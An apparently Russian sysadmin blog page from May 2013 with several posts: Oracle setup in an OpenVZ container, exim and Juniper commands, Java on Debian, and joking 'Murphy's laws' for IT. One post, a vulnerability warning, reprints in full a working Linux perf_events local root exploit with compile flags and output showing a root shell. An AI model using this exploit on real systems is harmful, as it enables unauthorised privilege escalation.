Поиск по этому блогу

понедельник, 27 мая 2013 г.

Законы Мёрфи для IT

Закон 1. Автоматизация бизнес-процессов не приводит к росту производительности — она приводит к большему количеству свободного времени у менеджеров/клерков исполнительного звена.

Следствие 1 закона. Большое количество свободного времени менеджеров оборачивается бóльшим количеством заявок на обслуживание и изобретательностью в перекладывании своей работы на других, в том числе сисадминов.

Дополнение к 1 закону. Любое время, потраченное на оптимизацию, в геометрической прогрессии увеличивает нагрузку на IT-отдел.

Вывод из 1 закона. Автоматизировать бизнес-процесс надо тогда и только тогда, когда это уже назрело и этого требует руководство. После внедрения обязательно потребовать премию.



Закон 2. Каждый менеджер/клерк стремиться сделать свою среду работы максимально удобной для себя в максимальный ущерб компании.

Дополнение к 2 закону. Уникальность бизнес-процессов компании — миф. Желание менеджера/клерка адаптировать интерфейс программ под свои нужды — это их нежелание осваивать работу со стандартной конфигурацией и программными средствами.

Следствие из 2 закона. Любое желание менеджера/клерка оптимизировать работу несёт вред.



Закон 3 (закон Парето для IT). 20% времени должно уделяться резервированию и документированию. Это лучше, чем 80% времени тратить на решение аварийных ситуаций.

Дополнение к 3 закону. 20% времени дают 80% результата по оптимизации и улучшению информационной системы. 80% времени и усилий пропадают зря.



Закон 4. IQ пользователя — величина отрицательная. Примите это как данность и делайте всё исходя из этой аксиомы — это сэкономит вам время и нервы.

Следствие из 4 закона. Пользователь всегда заблуждается. Любая информация, полученная от пользователя, должна быть проверена. Простейшая информация должна быть проверена вдвойне. Сложную информацию у пользователя лучше не узнавать вообще.



Закон 5. Глючит всё. Всё, что не может глючить, всё равно заглючит от сопряжённых с ним элементов. Если что-то не глючит — значит, оно скоро сгорит.

Дополнение к 5 закону. Ошибки, которые могут случиться, случаются. Те, которых быть не может в принципе, случаются несколько реже.



Закон 6. Все сроки, назначаемые IT-специалистами, срываются.

Дополнение к 6 закону. Если вы удвоили сроки — добавьте ещё 10–20% на дедлайн.



Закон 7. Любая система хаотична. Степень хаоса системы прямо пропорциональна времени её эксплуатации.



Закон 8. Ни один программный продукт или платформа не готовы к использованию при первом релизе.

Следствие из 8 закона. Любой продукт можно внедрять только после 1–2 полноценных пакетов исправлений.

воскресенье, 26 мая 2013 г.

Установка Oracle в proxmox используя openvz-контейнер CentOS

Заходим в web-интерфейс управления proxmox и создаём на основе шаблока openvz-контейнер. В качестве шаблона я взял centos-6-standard_6.3-1_i386.tar.gz.
Например был создан контейнер с id 105.
"Протюнингуем" этот контейнер:
vzctl set 105 --kmemsize unlimited --save
vzctl set 105 --lockedpages unlimited --save
vzctl set 105 --privvmpages unlimited --save
vzctl set 105 --shmpages unlimited --save
vzctl set 105 --numproc unlimited --save
vzctl set 105 --numtcpsock unlimited --save
vzctl set 105 --numflock unlimited --save
vzctl set 105 --numpty unlimited --save
vzctl set 105 --numsiginfo unlimited --save
vzctl set 105 --tcpsndbuf unlimited --save
vzctl set 105 --tcprcvbuf unlimited --save
vzctl set 105 --othersockbuf unlimited --save
vzctl set 105 --dgramrcvbuf unlimited --save
vzctl set 105 --numothersock unlimited --save
vzctl set 105 --dcachesize unlimited --save
vzctl set 105 --numfile unlimited --save
vzctl set 105 --numiptent unlimited --save
эти же действия можно проделать соответствующим образом отредактировав конфигурационный файл контейнера /etc/pve/openvz/105.conf. Теперь можно запустить контейнер. В контейнере установим пакеты, которые нам могут потребоваться по зависимостям:
yum install binutils compat-db gcc gcc-c++ glibc glibc-common libstdc++ libstdc++-devel gnome-media-libs gnome-utils-libs make ksh sysstat libaio gnome-screensaver openmotif22 xorg-x11-twm xorg-x11-xinit xorg-x11-xauth usbutils urw-fonts shared-mime-info perl-libwww-perl perl-XML-Parser perl-URI perl-HTML-Tagset perl-HTML-Parser patch lvm2 intltool libIDL libart_lgpl libbonobo xterm libcap libcroco libgnomecanvas libexif libgnomecups libgnomeprint22 libsoup libwnck libxklavier unixODBC unixODBC-devel libaio-devel elfutils-libelf-devel compat-libstdc++-33 -y
Так-же может возникнуть необходимость установить rpm-пакет pdksh версии 5.2.14, но так как в репозитории установленного контейнера его нет то придётся его скачать из "сторонних" источников:
wget ftp://ftp.sunet.se/pub/Linux/distributions/redhat/redhat-archive/redhat/linux/6.1/en/os/i386/RedHat/RPMS/pdksh-5.2.14-1.i386.rpm
rpm -i pdksh-5.2.14-1.i386.rpm
Проверяем:
rpm -q pdksh
Добавляем группы и пользователей:
groupadd oinstall
groupadd dba
useradd -m -g oinstall -G dba oracle
usermod -s/bin/bash oracle
passwd oracle
Проверяем:
id oracle
uid=1000(oracle) gid=1000(oinstall) groups=1000(oinstall),1001(dba)
Добавляем необходимые лимиты в /etc/security/limits.conf:
oracle  soft nproc  2047
oracle  hard nproc  16384
oracle  soft nofile  1024
oracle  hard nofile  65536
Создаём директории для нашего Oracle:
mkdir /home/oracle/11gR2_db
mkdir -p /u01/app/oracle/product/11.2.0/db_1
mkdir /u01/app/oracle/oradata
mkdir /u01/app/oraInventory
chown -R oracle:oinstall /u01/app/oracle /home/oracle/11gR2_db
chown -R oracle:oinstall /u01/app/oraInventory
chmod -R 775 /u01/app/oracle /home/oracle/11gR2_db /u01/app/oraInventory
 И, если не будет установлен libstdc++.so.5, можно создать символическую ссылку:
ls -l /usr/lib/libstdc++.so.5 || \
ln -s /usr/lib/libstdc++.so.6.0.13 /usr/lib/libstdc++.so.5
Отредактируем /etc/sysctl.conf на предмет следующих значений:
kernel.shmall = 2097152
kernel.shmmax = 536870912
kernel.shmmni = 4096
kernel.sem = 250 32000 100 128
fs.file-max = 6815744
net.ipv4.ip_local_port_range = 9000 65500
net.core.rmem_default=4194304
net.core.wmem_default=1048576
net.core.rmem_max=4194304
net.core.wmem_max=1048576
fs.aio-max-nr=1048576
и применим изменения:
sysctl -p
Вполне вероятно, что некоторые значения fs.file-max, net.ipv4.ip_local_port_range, net.core.rmem_default, net.core.wmem_default, net.core.rmem_max, net.core.wmem_max и fs.aio-max-nr придётся установить не в контейнере, а на самом хосте управления. Будьте готовы к этому. Если вы не являетесь администратором хоста управления то помните, что "админ шоколадки не пьёт!".
На данным момент времени мы потратили достаточно усилий и проделали работу результаты которой не хотелось бы потерять если дальше что-то пойдёт не так. Поэтому останавливаем контейнер, создаём резервную копию и запускаем его снова чтобы двигаться дальше.
Скачиваем архивы с Oracle (в моём случае это linux_11gR2_database_1of2.zip и linux_11gR2_database_2of2.zip) и распаковываем их, подготавливаем окружение к последующей установке. Производим нижеследующие действия из под пользователя oracle:
cd ~oracle/11gR2_db
unzip linux_11gR2_database_1of2.zip
unzip linux_11gR2_database_2of2.zip
cd ~oracle/11gR2_db/database
export ORACLE_BASE=/u01/app/oracle
export ORACLE_HOME=/u01/app/oracle/product/11.2.0/db_1/
export ORACLE_SID=ORA11G
 Если не установлена переменная окружения DISPLAY то попробуем сделать это самостоятельно:
export DISPLAY=localhost:0.0
"Кстати, о птичках". Наткнулся на "удивительный" баг когда при выставленном в sshd_config значении X11Forwarding yes, этот самый x11-форвардинг не работал.
Наткнулся на следующее "решение": в /etc/security/pam_env.conf определяем следующие строки:

REMOTEHOST      DEFAULT=localhost OVERRIDE=@{PAM_RHOST}
DISPLAY         DEFAULT=${REMOTEHOST}:0.0 OVERRIDE=${DISPLAY}
XAUTHORITY      DEFAULT= OVERRIDE=@{XAUTHORITY}
Но в моём случае это не помогло. Но зато помогла установка AddressFamily в значение inet в файле /etc/ssh/sshd_config. Пишут, что это известный баг. Вот только отчего-то очень не очевидный и мало кто приподнимает завесу тайны. Лично у меня ушел целый день на то чтобы совершенно случайно наткнутся на это решение и ву-а-ля X11Forwarding мгновенно заработал. 
И ещё, так как успешно-неудачных попыток при написании этого мануала было чуть менее чем более (и никто не сможет утверждать, что у него будет не так-же) то файлики с инсталяцией Oracle я предварительно скачал в /var/lib/vz, а затем, так как контейнеры находятся на том же разделе файловой системы, в момент когда это было необходимо, перед распаковкой, просто создавал жёсткие ссылки:

cd /var/lib/vz/private/105/home/oracle/11gR2_db
ln /var/lib/vz/linux_11gR2_database_1of2.zip linux_11gR2_database_1of2.zip
ln /var/lib/vz/linux_11gR2_database_2of2.zip linux_11gR2_database_2of2.zip
Достаточно быстро и достаточно удобно.
Ну так вот, теперь мы перед финишной прямой. Хорошей идеей будет создание очередной резервной копии.
Запускаем установку:
./runInstaller -ignoreSysPrereqs
После успешного окончания установки заходим root-ом и выполним следующие скрипты:
/u01/app/oraInventory/orainstRoot.sh
/u01/app/oracle/product/11.2.0/db_1/root.sh
Для успешного выполнения скрипта root.sh мне пришлось немного подредактировать 84-ю строку, заменив
$ECHO 6553600 > $FSMAXFILE
на
$ECHO 6553600
Добавляем в .bashrc учётной записи oracle следующие строки:
export ORACLE_BASE=/u01/app/oracle
export ORACLE_HOME=/u01/app/oracle/product/11.2.0/db_1
export LD_LIBRARY_PATH=$ORACLE_HOME/lib:$LD_LIBRARY_PATH
export PATH=$ORACLE_HOME/bin:$PATH
export ORACLE_HOSTNAME=localhost
export ORACLE_UNQNAME=oracle
export ORACLE_SID=oracle
ORACLE_HOSTNAME и ORACLE_UNQNAME можно определить из имени OC4J_DBConsole_*:
ls -l $ORACLE_HOME/oc4j/j2ee| grep OC4J_DBConsole
drwxr-x---  6 oracle oinstall 4096 Май 26 12:36 OC4J_DBConsole

drwxr-x--- 10 oracle oinstall 4096 Май 26 12:49 OC4J_DBConsole_localhost_oracle
В файле /etc/oratab будут содержаться ссылки на базы, а также указания какие из них должны запускаться автоматически:
oracle:/u01/app/oracle/product/11.2.0/db_1:Y
Любители sqlplus могут попробовать выполнить следующую команду:
sqlplus / as sysdba
Всё это хорошо, но к сожалению установщик Oracle совсем забыл о том, что мы не просто хотим установить Oracle, но ещё и использовать его после каждой перезагрузки контейнера, а для этого нам нужен какой-никакой стартовый скрипт. Вот его нам придётся создать вручную, /etc/init.d/dbora:
#!/bin/sh -e

# chkconfig: 345 90 10
# description: Oracle 11G custom start/stop script

. /etc/rc.d/init.d/functions

LOCKFILE=/var/lock/subsys/oracle
DAEMON=oracle
ORACLE_HOME=/u01/app/oracle/product/11.2.0/db_1
ORACLE_OWNER=oracle

restart() {
    stop
    start
}

case $1 in
    'start')
        if [ -f $LOCKFILE ]; then
            echo $0 already running.
            exit 1
        fi
        su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/lsnrctl start"
        su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/dbstart $ORACLE_HOME"
        su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/emctl start dbconsole"
        #su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/isqlplusctl start"
        touch $LOCKFILE
    ;;
    'stop')
        if [ ! -f $LOCKFILE ]; then
            echo $0 already stopping.
            exit 1
        fi
        su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/lsnrctl stop"
        su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/dbshut"
        su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/emctl stop dbconsole"
        #su - ${ORACLE_OWNER} -c "${ORACLE_HOME}/bin/isqlplusctl stop"
        rm -f $LOCKFILE
    ;;
    restart)
        restart
    ;;
    *)
        echo "Usage: $0 {start|stop}"
        exit
    ;;
esac

exit $?
Далее:
chmod +x /etc/init.d/dbora
chkconfig --add dbora
chkconfig dbora on
reboot-им контейнер!
Теперь зайти в Oracle Enterprise Manager можно по ссылке https://oraclecontainerhost:1158/em, пользователь SYS, пароль тот, что вводился при установке, входить как SYSDBA.

Продолжение возможно будет следовать... ;)

вторник, 21 мая 2013 г.

exim - проверка работоспособности

Проверяем какой маршрутизатор и доставщик будет использоваться:
exim -bt user_at_domain
Отправляем тестовое письмо:
exim -v -odf olden@isalon.kiev.ua
LOG: MAIN
  cwd=/home/user 4 args: exim -v -odf user_at_domain
test
.
LOG: MAIN
  <= user_at_domain U=user P=local S=325
LOG: MAIN
  cwd=/var/spool/exim4 5 args: /usr/sbin/exim4 -v -odi -Mc 1UeNoa-0002CX-ER
delivering 1UeNoa-0002CX-ER
LOG: MAIN
  => user  F= R=mysqluser T=mysql_delivery S=442
LOG: MAIN
  Completed
.

понедельник, 20 мая 2013 г.

Juniper - rollback compare и другие "дежурные" команды

Собственно эта статья и не статья, а так, заметка, памятка, с "дежурными" командочками, которые когда нужны то отчего-то постоянно вылетают из головы.

Сравнить две конфигурации, например текущую и предыдущую, можно так:
> show system rollback compare 1 0
JunOS хранить 50 последних "закоммиченых" конфигураций, включая текущую. Так что если сказать show system rollback compare 49 0 то можно получить очень большой diff ;)

Список доступных сохранённых конфигураций (коммитов) можно посмотреть так:
> show system commit

Посмотреть на каком маршрутизаторе в сети живёт тот или иной адрес, если в сети используется ibgp, можно так:
> show route table inet.0 1.2.3.4 extensive | match orig
При этом Originator ID: это и будет ip-адрес того маршрутизатора, который проанонсил сеть включающую искомый адрес.

Посмотреть текущую загрузку порта маршрутизатора, практически в реальном времени, можно так:
> monitor interface ge-1/0/0.3785
А обмен между портом маршрутизатора и портом клиента так:
> monitor traffic interface ge-1/0/0.3785
Однако следует заметить, что так можно посмотреть только локальный трафик. Трафик идущий транзитно таким образом не отслеживается.

вторник, 14 мая 2013 г.

Внимание! В ядрах Linux от 2.6.37 до 3.x.x (3.8.10) выявлена уязвимость дающая root-доступ.

Гершафтен, сегодня печальная новость. В "этих ваших Интернетах" была опубликован эксплоит который позволяет получить root-доступ из под произвольного пользователя. Проблема присутствует в коде PERF_EVENTS, которая должна быть активирована для успешной эксплуатации уязвимости. Проверяем:
$ cat /boot/config-$( uname -r ) | grep -i PERF_EVENTS
CONFIG_HAVE_PERF_EVENTS=y
CONFIG_PERF_EVENTS=y
CONFIG_HAVE_PERF_EVENTS_NMI=y
либо:
$ zcat /proc/config.gz  | grep -i PERF_EVENTS
CONFIG_HAVE_PERF_EVENTS=y
CONFIG_PERF_EVENTS=y
CONFIG_HAVE_PERF_EVENTS_NMI=y
Так как исходный код и без того доступен сообществу то рискну его опубликовать и у себя в блоге:
/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}


int  main() {
  uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  uint32_t *map, j = 5;
  int i;
  struct {
    uint16_t limit;
    uint64_t addr;
  } __attribute__((packed)) idt;
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  memset(map, 0, SIZE);
  sheep(-1); sheep(-2);
  for (i = 0; i < SIZE/4; i++) if (map[i]) {
    assert(map[i+1]);
    break;
  }
  assert(i<SIZE/4);
  asm ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  u = getuid(); g = getgid();
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  setresuid(u,u,u); setresgid(g,g,g);
  while (j--) {
    needle = AB(j+1);
    assert(p = memmem(code, 1024, &needle, 8));
    if (!p) continue;
    *p = j?((g<<32)|u):(idt.addr + 0x48);
  }
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  asm("int $0x4");  assert(!setuid(0));
  return execl("/bin/bash", "-sh", NULL);
}
Однако, если компилировать просто как:
$ gcc root-exploit.2.6.37~3.8.10.c -o root-exploit.2.6.37~3.8.10
то неприятности Вас поджидать не будут, так как всё закончится банальной аварийной остановкой программы:
$ ./root-exploit.2.6.37~3.8.10 
2.6.37-3.x x86_64
sd@fucksheep.org 2010
root-exploit.2.6.37~3.8.10: root-exploit.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Аварийный останов
Во всяком случае вышесказанное справедливо для ядра 3.2.0-4-amd64, платформы x86_64 Debian GNU/Linux Wheezy.
Для получения ожидаемого (root-доступ) результата следует gcc скормить опцию O2. Тогда результат выполнения будет более "трагичным":
$ ./root-exploit.2.6.37~3.8.10.O2 
2.6.37-3.x x86_64
sd@fucksheep.org 2010
# logout
$
Мораль сей басни такова: ждём выхода обновлений для ядра и не даём кому-попало shell-доступ.

вторник, 7 мая 2013 г.

Установка Java7 в Debian Wheezy и подключение плагина к Google Chrome

Для начала установим пакет java-package, который предоставит нам утилиту make-jpkg:
aptitude install java-package
Затем скачаем JDK с ресурса Oracle http://www.oracle.com/technetwork/java/javase/downloads/index.html, пусть в нашем случае это будет архив jdk-7u21-linux-x64.tar.gz.
Затем создадим из этого архива deb-пакет:
make-jpkg jdk-7u21-linux-x64.tar.gz
в итоге у нас будут собран файл oracle-j2sdk1.7_1.7.0+update21_amd64.deb. Устанавливаем его:
sudo dpkg -i oracle-j2sdk1.7_1.7.0+update21_amd64.deb
При желании можно так-же обновить алтернативы для версии Java которая будет использоваться по-умолчанию:
for P in $( ls -l /etc/alternatives | grep java | awk '{ print $9 }' ); do update-alternatives --config $P; done
Ну и теперь дело осталось за малым, подключим Java-плагин к Google Chrome:
mkdir /opt/google/chrome/cron
chmod 755 /opt/google/chrome/cron
ln -s /usr/lib/jvm/j2sdk1.7-oracle/jre/lib/amd64/libnpjp2.so /opt/google/chrome/plugins/libjavaplugin.so
И не забываем перезапустить Google Chrome. После перезапуска проверить наличие модуля можно перейдя по ссылке chrome://plugins/, смотрим раздел Java(TM). Проверить правильность установки, а заодно и версию Java, можно перейдя по ссылке Verify Java Version.
Если после проверки всё отобразилось нормально - поздравляю, всё сделано правильно!